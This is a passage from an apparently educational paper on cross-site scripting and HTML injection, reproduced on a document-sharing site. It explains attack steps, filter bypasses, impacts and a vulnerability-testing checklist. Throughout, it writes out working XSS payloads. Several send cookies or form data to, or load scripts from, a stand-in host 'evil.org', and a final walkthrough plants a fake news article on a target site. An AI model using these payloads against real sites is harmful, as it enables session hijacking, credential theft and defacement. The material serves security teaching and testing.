ely bypassing the authentication process. Unfortunately, the mechanism of the at
tack is very simple and can be easily automated. A detailed paper by iDefence go
es into great detail explaining the process, but can be quickly summarised as fo
llows:
1. The attacker investigates an interesting site that normal users must authe
nticate to gain access to, and that tracks the authenticated user through the us
e of cookies or session IDs
2. The attacker finds a CSS vulnerable page on the site, for instance http://
trusted.org/ account.asp.
3. Using a little social engineering, the attacker creates a special link to
the site and embeds it in an HTML email that he sends to a long list of potentia
l victims.
4. Embedded within the special link are some coding elements specially design
ed to transmit a copy of the victims cookie back to the attacker. For instance:
<img src="http://trusted.org/account.asp?ak=<script>document.location .replace('
http://evil.org/steal.cgi?'+document.cookie);</script>">
5. Unknown to the victim, the attacker has now received a copy of their cooki
e information.
The attacker now visits the web site and, by substituting his cookie information
with that of the victims, is now perceived to be the victim by the server appli
cation.
Note that Cross-site scripting is commonly referred to as CSS and/or XSS.
Understanding Code Insertion
To date, security professions have discovered an ever increasing number of metho
ds for potentially embedding code within poorly configured web applications. The
following are some of the more common methods for doing so.
Inline Scripting
http://trusted.org/search.cgi?criteria=<script>code</script>
http://trusted.org/search.cgi?val=<SCRIPT SRC='http://evil.org/badkama.js'> </SC
RIPT>
http://trusted.org/COM2.IMG%20src= "Javascript:alert(document.domain)"
Forced Error Responses
http://trusted.org/<script>code</script>
This insertion facet usually occurs due to poor error handling by the web server
or application component. The application fails to find the requested page and
reports an error which unfortunately includes the unprocessed script data.
http://trusted.org/search.cgi?blahblahblahblahblah<script>code</script>
If a Java application such as a servlet fails to handle an error gracefully, and
allows stack traces to be sent to the users browser, an attacker can construct
a URL that will throw an exception and add his malicious script to the end of th
e request.
http://trusted.og/servlet/ org.apache.catalina.servlets.WebdavStatus/<script>cod
e</script>
In the example above, when the Tomcat servlet is called with the training illegi
timate request, an error page is served containing the offending text verbatim.
Non <SCRIPT> Events
" [event]='code'
In many cases it may be possible for an attacker to insert an exploit string, wi
th the above syntax, into a HTML tag that should have been like:
<A HREF="exploit string">Go</A>
resulting in:
<A HREF="" [event]='code'">Go</A>
<b onMouseOver="self.location.href='http://evil.org/'">bolded text</b>
As the client cursor moves over the bolded text, an intrinsic event occurs and t
he JavaScript code is executed.
JavaScript Entities
<img src="&{alert('CSS Vulnerable')};">
The special character & is sometimes interpreted as a new JavaScript code segment
(entity).
Typical Payloads Formatting
<img src = "malicious.js">
<script>alert('hacked')</script>
<iframe = "malicious.js">
<script>document.write('<img src="http://evil.org/'+document.cookie+'") </script
>
Insertion Example
Dynamic URL Generation
Consider an application built for running on Microsofts Internet Information Serv
er (IIS) web server platform. Dynamic content is delivered through IISs Active Se
rver Pages (ASP).
Within the sample page, a dynamically built HTML tag for refining search paramet
ers is constructed as follows:
<A HREF="http://trusted.org/search_main.asp? searchstring=SomeString">click-me</
A>
and the ASP code required to generate a further query based upon this submitted
information is:
<%
var BaserUrl = "http://trusted.org/search2.asp?
searchagain=";Response.Write("<a href=\"" + BaseUrl
+ Request.QueryString("SearchString") + "\">click-me</a>" )
%>
If the attacker was to replace the SomeString with their own code, as indicated ne
xt:
<a href="http://trusted.org/search_main.asp?
SearchString=%22+onmouoseover%3D%27ClientForm%
2Eaction%3D%22evil%2Eorg%2Fget%2Easp%3FData%
3D%22+%2B+ClientForm%2EPersonalData%3BClientForm%
2Esubmit%3B%27">FooBar</a>
The likely result found in the dynamically generated ASP page will be:
<A HREF="http://trusted.org/search2.asp?
searchagain="" onmouoseover='ClientForm.
action="evil.org/get.asp?Data=" +
ClientForm.PersonalData;ClientForm.
submit;'">click-me</A>
In this case, the attacker has added to the HTML page code, and used the DOM of
the HTML page to redirect data in some form to the attackers web site.
Bypassing Anti-CSS Filters
A key function of any application filtering process will be the removal of possi
ble dangerous special characters. However, in many circumstances it may be diffi
cult to filter a large range of these characters due to the applications unique
requirements.
Corporate application developers must carefully evaluate how their code will per
form with a variety of attack strings. In addition, they should fully understand
the different methods that special characters can be encoded.
One of the most popular alternative character representations is HTML escaped en
coding, sometimes mistakenly referred to as Unicode encoding. In this system, th
e HEX value of the ASCII character is prefixed with the % character.
Char ; / ? : @ = & < >
#
Code %3b %2f %3f %3a %40 %3d %26 %3c %3e
%22 %23

Char { } | \ ^ ~ [ ] `
%
Code %7b %7d %7c %5c %5e %7e %5b %5d %60
%25 %27
To better understand the processes behind bypassing Anti-CSS filtering mechanism
s, a series of detailed examples are provided below.
Inserting Malicious Code
Simple Filtering of < and >
Many applications that implement some kind of content filtering will typically f
ilter out the < and > characters at the client-side. At first glance, this looks lik
e an effective way of ensuring <script> type HTML tags are not possible. Unfortu
nately, not only client-side code easy to bypass, in many circumstances it can b
e bypassed using a mix of alternative character representations and other specia
l characters.
Consider a routine that removes the < and > special characters:
document.write(cleanSearchString('<>'));
The attacker now uses an alternative coding for the filtered characters, \x3c and \
x3e respectively, and initialises their code with ) + to escape out of the routine.
') + '\x3cscript src=http://evil.org/malicious.js\x3e\x3c/script\x3e'
Commenting out malicious code
Consider an application that filters content on behalf of it clients by causing
any scripting content to be safely commented out. For instance, <script>code</scri
pt> is filtered by the application to become:
<COMMENT>

</COMMENT>
Unfortunately, it is a simple task to bypass the filter. This is accomplished by
including script code that will close the <comment> filter process. For example
, the attacker can send the following code:
<script>
- -->
</COMMENT>
<img src="http://none" onerror="alert(document.cookie);window.open( http://evil.
org/fakeloginscreen.jsp); ">
</script>
After processing by the filter, the following code is embedded in the returned d
ocument:
<COMMENT>

</COMMENT>
<img src="http://none" onerror="alert(document.cookie);window.open(http://evil.o
rg/ fakeloginscreen.jsp);">
</COMMENT>
This particular attack was originally designed to bypass the security filtering
processes of a large web-mail provider, and would have been embedded in HTML ema
il content. Users viewing the email would automatically be prompted with a fake
login screen, making for an easy method of harvesting user names and passwords.
Separate Window Handling
A popular method of handling potentially dangerous URL information is to force t
he URL to be opened in a new browser window. This then causes and malicious code
to be executed in the context of a different DOM, using the target=_blank addition
to the HTML <HREF> tag.
Unfortunately, in many online email applications it is possible to bypass after
analysing the harmless link supplied by the site.
Consider a site that parses the content,
and, after processing, becomes:
<a href="javascript:" target="_blank">click-me</a>
Causing the URL to be opened in a new window.
However, if the attacker constructs his HREF as follows,
<a href="javascript:..." foo="bar>click-me</a>
it will be interpreted as:
<a href="javascript:..." foo="bar target="_blank">click-me</a>
causing the code to be executed in the same page, under the same DOM.
Escaped JavaScript Entities
In cases where almost all special characters have are filtered from user supplie
d strings, attackers must encode the entire attack string.
Consider the following URL:
http://trusted.org/search.cgi?query=%26%7balert%28%27EVIL %27%29%7d%3b&apropos=p
os2
The %26%7balert%28%27EVIL%27%29%7d%3b resolves to &{alert('EVIL')}; causing in thi
s instance an unexpected JavaScript alert window to popup, with the text EVIL.
Web Integration
As client web browsers have evolved, they have incorporated an increasingly dive
rse range of functions. At the same time, many common desktop applications have
extended their functionality to replicate or incorporate the functionality of th
ese same browsers. While the security flaw may be HTML injection, and more speci
fically CSS, the avenues available for a malicious user or attacker to initiate
the attack are becoming ever broader. As is already evident, a popular personalis
ed delivery mechanism has now become HTML email. Unfortunately, the delivery meth
ods are becoming so diverse that no single security solution is available to preve
nt the attack. Consider the significance of the following delivery mechanisms.
The Flash! Attack
Flash! is a popular application for displaying animated visual information. Is h
as its own development language (ActiveScript) for creating sophisticated interac
tive menus, animated movies and games. The most popular web browsers often insta
ll the interpreter for these files by default and, due to the large number of si
tes that use the technology; many people will install the interpreter even if it
wasnt originally available with their web browser.
ActiveScript has an internal function called getURL(). This function is used for
redirecting the client browser to another page. Normally the parameter supplied
to the function would be a URL. However, due to integration features between th
e Flash! interpreter and the web browser, it is possible to insert scripting cod
e that would be successfully interpreted by the client web browser.
For instance, instead of:
getURL("http://www.technicalinfo.net")
It is possible to specify scripting code:
getURL("javascript:alert(document.cookie)")
Thus, it is possible to embed potentially dangerous scripting elements within a
common file format. The real significance of this threat is that it potentially
bypasses many corporate content inspection systems (particularly those that filt
er out HTML <script> type tags) and local security web browser settings.
For an attack to be successful, the dangerous Flash! file (typically terminating
in a .swf extension) must be embedded within HTML data for viewing by remote clie
nts. Normally this occurs with the use of the <EMBED> or <OBJECT> tags, for inst
ance:
<EMBED
src="http://evil.org/badflash.swf" pluginspage="http://www.macromedia.com/shockw
ave/download/index.cgi?
P1_Prod_Version=ShockwaveFlash"
type="application/x-shockwave-flash"
width="100"
height="100">
</EMBED>
The Impact
The impact of malicious code insertion is often difficult to quantify and will c
hange as new functionality or interactions are incorporated into both web server
s and client browsers. Already, users may unintentionally execute scripts writte
n by an attacker when they follow untrusted links in web pages, mail or instant
messages, or any other application capable of displaying HTML content (e.g. Micr
osoft Help). For this reason, a series of examples best illustrate the diversity
and impact of potential threats.
Consider the following examples:
* An attacker often has access to the document retrieved since the malicious
scripts are executed in a context that appears to have originated from the trus
ted site. With the appropriate insertions, a script could be used to read fields
in a form provided by the trusted server and send this data back to the attacke
r.
* An attacker may be able to embed script code that has additional interacti
ons with the legitimate web server without alerting the victim. For example, the
attacker could develop an exploit that posted data to a different page on the l
egitimate web server.
* An attacker may be able to poison the sites persistent cookies, thus modif
ying the cookie content and causing malicious code to be executed each time the
user visits the trusted site. The malicious code is stored as a field variable w
ithin the cookie, and executed each time the site dynamically generates page con
tent without the correct processing.
* An attacker may be able to cause a hidden window to start on the client mach
ine and us this to key-log all browser interaction of the victim. Should the vic
tim later visit sites requiring authentication, the attacker could harvest this
information.
* CSS type attacks can occur over SSL-encrypted connections. The victim, acc
essing a trusted host over HTTPS, may still execute an attackers code unintentio
nally. If the attacker references document components on a remote host, the vict
ims client browser may generate a warning message about the insecure connection.
However, the attacker can circumvent this warning by simply referencing content
on a SSL-capable web server.
* An attacker may construct the malicious code to reference internal resourc
es. Thus, an attacker may gain unauthorised access to an Intranet web server. On
ly one page on one web server in a domain is required to compromise the entire d
omain.
* An attacker may be able to bypass policies that prevent the victim browser
from executing scripts. For example, Internet Explorer security zones may prevent
the execution of scripts from untrusted Internet hosts. An attacker may embed t
heir code within the content of a trusted internal host.
* An attacker may use a social engineering aspect to the attack. Consider an
application that requires clients to complete a form to set up their account. A
n attacker may be able to insert malicious code into their application data. A q
uick phone call to the corporate help-desk asking for advice on their account ma
y cause the execution of the malicious code on the help-desk system.
* Even if the victims web browser does not support scripting, an attacker may
still be able to alter the content of the page affecting its appearance, behavi
our or normal operation.
To date the most popular application content to be targeted by attackers has bee
n web pages that:
* Return results based upon user input to search engines,
* Process credit card information,
* Store and user supplied content in databases and cookies for later retriev
al.
Vulnerability Checking
Finding out if your application is vulnerable to a code insertion attack is ofte
n very simple. The key lies in the analysis of the dynamically generated client-
side HTML content. The following process has been frequently used in the past.
1. For each visible input field (these may be located in an HTML form, or rep
resented in the URL as variable=), try the most obvious scripting formats:
<script>alert('CSS Vulnerable')</script>
<img csstest=javascript:alert('CSS Vulnerable')>
&{alert('CSS Vulnerable')};
In any case, should an alert message popup with the text CSS Vulnerable, the
application component is vulnerable - specifically the input field just checked
.
2. If, either of the above scripting checks cause the HTML page to display in
correctly, the application component may still be vulnerable.
3. For each visible variable, submit/substitute the following string:
'';!--"<CSS_Check>=&{()} (Note that the string begins with two single-quot
es)
On the resultant page, search for the string <CSS_Check>. If you discover <CS
_Check>, it is quite probable that the application component is vulnerable. Howev
er, if the word CSS_Check is no longer enclosed in something similar to %ltCSS_C
heck%gt, then it may not be vulnerable. If input is displayed literally at ANY p
oint in the document, it can be used to divert the flow of execution to an attac
ker-supplied payload.
4. Having located the word CSS_Check, verify what (if any) other characters h
ave be altered or filtered from the original string '';!--"<CSS_Check>= &{()}. Dep
ending upon the filtered characters, the application component may still be vuln
erable.
5. Looking closely at the returned HTML code, identify the specific string an
attacker would need to break out of the current HTML tag or code sequence. If t
hese characters exist, unfiltered, in responses to the test string of part 3 (ab
ove) then there is a high probability that the application component is vulnerab
le.
6. Moving on from the obvious fields, repeat the process for all the hidden f
ields not normally editable at the client end. The best method of doing this is
through the use of a free local host proxy server such as Achilles by DigiZen Se
curity group and WebProxy by @stake. The proxy servers allow the editing of HTTP
requests as they leave the client application, before being finally sent to the
server application.
7. In many cases, data will be submitted via the HTTP GET request. Throughout
the investigation, take note of potentially vulnerable application components t
hat require the HTTP POST command to submit data.
It is a simple process of turning a POST into a GET submission. If the applicati
on component fails to respond to the GET the same way as it did for the POST sub
mission, it is probably not vulnerable to a URL based inline scripting attack.
Putting It All Together
To bring together many of the ideas and processes discussed earlier in this docu
ment, an example can be used to bring it all together. In this example, the anon
ymous site has a search engine that responds to client data submissions. Normall
y the site would look like this:
In our first test, we try submitting our first test string <script>alert('CSS Vu
lnerable')</script>, and receive the following response:
Notice the strange response in the Your Search box on the left. Zoomed in below.
Taking a closer look at the content source, we notice that our sample code appea
rs 21 times in the document, in various formats.
It appears 10 times in a format similar to:
<SCRIPT language="JavaScript1.1" SRC="http://ad.uk.doubleclick.net/adj/
anonymous.com/search;cat=search;sec=search;kw=<script>alert('css_vulnerable')
</script>;pos=top;sz=468x60;tile=1;ptile=1;ord=-308506361?"></SCRIPT>
9 times in a format similar to:
<a href="Search?q=%3Cscript%3Ealert%28%27CSS+Vulnerable%27%29%3C%2Fscript
%3E&pager.offset=10">2</a>
And twice in the format similar to:
document.writeln('<INPUT TYPE=\"TEXT\" NAME=\"q\" SIZE=\"16\" MAXLENGTH=\
"70\" VALUE=\'<script>alert('CSS Vulnerable')</script>\'>');
Obviously there are three different server-side processing routines for processi
ng client search data.
1. In the first type (ad.uk.doubleclick.net format), it appears that the proc
essing routine changes the case of characters and changes white space to the und
erscore (_).
2. The second type (href=) converts special characters into their escape-enco
ded formats, and white space into the + character.
3. The third type (document.writeln) places the complete string within a docu
ment.writeln JavaScript routine.
Several opportunities present themselves here. To make the site execute the Java
Script alert box for each type, we need to force the <script> tags outside of an
y other HTML tags. Thus, for each type, the following methods will work:
1. ><script>alert('CSS Vulnerable')</script><b a=a
2. a></a><script>alert('CSS Vulnerable')</script>
3. \'><script>alert%28\'CSS Vulnerable\'%29</script><
The result is the following alert box (multiple times):
However, for this example, we shall focus on the last type (document.writeln). S
ince it is possible to inject code into the returned HTML page to the anonymous
News site, to make the attack interesting, we shall write our own fake news articl
e.
Due to the maximum length of any string we can send to the site, and the likely
length of the fake news article, we shall create a JavaScript include file (.js)
which we will load in to the page using: \'><script%20src%3dhttp://evil.org/fak
ed.js></script>
In this example, the include file will use multiple document.write statements to
create the fake news article. There are several key features to the include fil
e, and include -
* Use of HTML <DIV> tags to position the content on the page. Doing so allow
s the attacker to cover over existing content as they wish.
* Using a table to keep all the article text together.
* Rewriting of the URL source field at the top of the browser.
* Rewriting of the browser status bar.
From the first few lines of the fake.js file:
var d = document;
d.write('<DIV id="fake" style="position:absolute; left:200; top:200; z-index:2">
<TABLE width=500 height=1000 cellspacing=0 cellpadding=14><TR>');
d.write('<TD colspan=2 bgcolor=#FFFFFF valign=top height=125>');
So far, everything we have tested on the site makes use of the existing form to
submit the attackers code. This submission is done by a HTTP POST command, such a
s:
POST /Search HTTP/1.0
Referer: http://www.anonymous.com/Search
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Host: www.anonymous.com
Content-Length: 135
Pragma: no-cache
dropnav=Pick+a+section&q=\'><script%20src%3dhttp://evil.org/faked.js>
</script>newSearch=true&pro=IT&searchOption=articles
It is a simple process to convert the HTTP POST into a single URL. Unfortunately
for the anonymous news site, the web application does not differentiate the met
hods of receiving data. Thus the following attack URL allows the attacker to pla
ce his own content on the site.
http://www.anonymous.com/Search?dropnav=Pick+a+section&q=\'><script
%20src%3dhttp://evil.org/faked.js></script>newSearch=true&pro=IT
&searchOption=articles

XSS and HTML Code Injection

Uploaded by

Copyright:

Available Formats

You might also like

XSS and HTML Code Injection

Uploaded by

Document Information

Original Description:

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

XSS and HTML Code Injection

Uploaded by

Copyright:

Available Formats

HTML Code Injection and Cross-site scripting

Understanding the cause and effect of CSS (XSS) Vulnerabilities

You might also like